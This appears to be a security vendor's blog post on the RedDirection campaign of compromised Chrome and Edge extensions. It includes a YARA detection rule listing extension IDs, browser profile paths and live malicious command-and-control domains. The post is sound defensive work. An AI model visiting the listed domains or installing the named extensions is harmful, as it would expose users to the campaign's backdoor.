RedDirection: A YARA Rule to Detect its Artifacts

An investigation into a seemingly benign Color Picker browser extension revealed a sophisticated cross-platform campaign. On July 8, 2025, Koi Security reported on Red Direction, a campaign of 18 compromised Edge and Chrome extensions that affected over 2 million web users. The campaign is a meticulous operation that delivers both a completely functional product and a backdoor to a C2 server. According to Koi Security, all the extensions were verified by Google and Microsoft Edge and turned malicious after years of legitimate activity– making this operation all the more alarming.

How This Happens

Threat actors are known to abuse trust features so this kind of attack should come as no surprise to anyone in the security community. Koi Security said it best, Google’s and Microsoft’s reviewing process is created “for scale, not scrutiny”. As consumers, we tend to assume that products that are endorsed by big platforms are inherently safe. This incident serves as a reminder that we should always be vigilant.

Detecting RedDirection With Stairwell’s YARA Rule

While most of the compromised extensions have now been removed from Chrome’s Web Store and Microsoft Edge’s Add-ons store, some of the malicious domains remain active– such as undiscord[.]com and unyoutube[.]net. Thus, it is paramount to perform a comprehensive search to ensure all RedDirection artifacts are detected and remediated. 

To aid this effort, we have crafted a YARA rule that enables effective and efficient scanning for these Indicators of Compromise:

rule Chrome_Edge_Extensions_RedDirection
{
    meta:
        author = "Evelyne Diaz Araque ([email protected])"
        date = "2025-07-10"
        description = "Chrome + Edge extensions and domains compromised in the Red Direction campaign."

    strings:
        // chrome extension path structure
        $path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\" ascii nocase
        $path2 = "\\Extensions\\" ascii nocase

        // chrome
        $ext1 = "kgmeffmlnkfnjpgmdndccklfigfhajen" ascii nocase // Emoji keyboard online — copy&past your emoji
        $ext2 = "dpdibkjjgbaadnnjhkmmnenkmbnhpobj" ascii nocase // Free Weather Forecast
        $ext3 = "gaiceihehajjahakcglkhmdbbdclbnlf" ascii nocase // Video Speed Controller — Video manager
        $ext4 = "mlgbkfnjdmaoldgagamcnommbbnhfnhf" ascii nocase // Unlock Discord — VPN Proxy to Unblock Discord Anywhere
        $ext5 = "eckokfcjbjbgjifpcbdmengnabecdakp" ascii nocase // Dark Theme — Fake version of Dark Reader for Chrome
        $ext6 = "mgbhdehiapbjamfgekfpebmhmnmcmemg" ascii nocase // Volume Max — Ultimate Sound Booster
        $ext7 = "cbajickflblmpjodnjoldpiicfmecmif" ascii nocase // Unblock TikTok — Seamless Access with One-Click Proxy
        $ext8 = "pdbfcnhlobhoahcamoefbfodpmklgmjm" ascii nocase // Unlock YouTube VPN
        $ext9 = "eokjikchkppnkdipbiggnmlkahcdkikp" ascii nocase // Color Picker, Eyedropper — Geco colorpick
        $ext10 = "ihbiedpeaicgipncdnnkikeehnjiddck" ascii nocase // Weather

        // edge extension path structure
        $path3 = "\\AppData\\Local\\Microsoft\\Edge\\User Data\\" ascii nocase
        $path4 = "\\Extensions\\" ascii nocase

        // edge
        $id1 = "jjdajogomggcjifnjgkpghcijgkbcjdi" ascii nocase // Unlock TikTok
        $id2 = "mmcnmppeeghenglmidpmjkaiamcacmgm" ascii nocase // Volume Booster — Increase your sound]
        $id3 = "ojdkklpgpacpicaobnhankbalkkgaafp" ascii nocase // Web Sound Equalizer
        $id4 = "lodeighbngipjjedfelnboplhgediclp" ascii nocase // Header Value
        $id5 = "hkjagicdaogfgdifaklcgajmgefjllmd" ascii nocase // Flash Player — games emulator
        $id6 = "gflkbgebojohihfnnplhbdakoipdbpdm" ascii nocase // Youtube Unblocked
        $id7 = "kpilmncnoafddjpnbhepaiilgkdcieaf" ascii nocase // SearchGPT — ChatGPT for Search Engine
        $id8 = "caibdnkmpnjhjdfnomfhijhmebigcelo" ascii nocase // Unlock Discord

        // domains
        $d1 = "admitab.com" ascii nocase
        $d2 = "edmitab.com" ascii nocase
        $d3 = "click.videocontrolls.com" ascii nocase
        $d4 = "c.undiscord.com" ascii nocase
        $d5 = "click.darktheme.net" ascii nocase
        $d6 = "c.jermikro.com" ascii nocase
        $d7 = "c.untwitter.com" ascii nocase
        $d8 = "c.unyoutube.net" ascii nocase
        $d9 = "admitclick.net" ascii nocase
        $d10 = "addmitad.com" ascii nocase
        $d11 = "admiitad.com" ascii nocase
        $d12 = "abmitab.com" ascii nocase
        $d13 = "admitlink.net" ascii nocase

    condition:
         ($path1 and $path2 and  1 of ($ext*)) or 
         ($path3 and $path4 and  1 of ($id*)) or
         (1 of ($d*))
}

Read more about RedDirection in another Stairwell blog post.